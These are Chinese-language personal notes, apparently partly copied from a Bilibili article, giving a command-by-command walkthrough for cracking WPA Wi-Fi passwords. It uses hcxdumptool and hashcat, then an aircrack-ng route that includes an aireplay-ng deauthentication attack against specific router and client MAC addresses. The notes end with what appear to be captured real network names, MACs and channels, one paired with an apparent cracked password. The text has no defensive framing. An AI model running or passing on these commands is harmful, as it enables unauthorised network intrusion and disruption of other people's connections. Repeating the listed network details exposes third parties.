01.两种方式(apt/github)安装hcxdumptool和hcxpcapngtool _sudo apt update hcxdumptool hcxpcapngtool _git clone https://github.com/ZerBea/hcxdumptool.git ls cd hcxdumptool sudo apt-get install libcurl4-openssl-dev libssl-dev pkg-config make sudo make install 02.iwconfig:显示网卡信息 03.停止网卡服务 sudo systemctl stop NetworkManager.service sudo systemctl stop wpa_supplicant.service 04.监测网卡服务 sudo hcxdumptool -i wlan0 -o dumpfile.pcapng --active_beacon --enable_status=1 05.打开网卡服务 sudo systemctl start wpa_supplicant.service sudo systemctl start NetworkManager.service 06.格式转化 hcxpcapngtool -o hash.hc22000 -E essidlist dumpfile.pcapng 07.hashcat破解 hashcat.exe -m 22000 hash.hc22000 wordlist.txt 01.获取网卡信息 sudo airmon-ng 或iwconfig 或ifconfig 02.加载无线网卡 ifconfig wlan0 up 03.开启网卡监听模式 airmon-ng start wlan0 04.查看监听模式是否开启 iwconfig 05.探测无线网络 airodump-ng wlan0mon 06.探测指定无线网络 airodump-ng -c 6 --ivs -w test --bssid 22:44:44:44:dd:dd wlan0mon 重新连接的用户即可获取握手包 出现WPA handshake:BSSID 即成功 07.强制下线攻击客户端 aireplay-ng -0 2 -a 2E:20:0B:52:FD:A4 -c 2C:6F:C9:15:49:75 wlan0mon //# aireplay-ng -0 2 -a BSSID -c STATION wlan0mon BSSID路由器MAC地址 监听窗口获取WPA handshake ctrl+z暂停攻击 08.握手包cap转haccp格式 利用官网在线网站(https://hashcat.net/cap2hashcat/) https://www.youtube.com/watch?v=0xcLbPkzN9w 在线转化大小小于20M,后台服务器有跑路可能 离线转换工具 git clone https://github.com/ZerBea/hcxtools.git # (下载慢的话,自己找github的镜像站或加速,国内是有的。) cd hcxtools 作者:幻雨之秋 https://www.bilibili.com/read/cv16341293/ 出处:bilibili make make install (as super user) ltecpe-41E8 20:89:6f:fe:dd:2f 1 ltecpe-41E8 20:89:6f:fe:dd:2f 1 GCBiotech:88627255 *****BT:5E:5F:67:71:BD:5D CH8 CEDRICWIFI:F4:84:8D:5C:C2:2C CH11
note.re
/imrivermax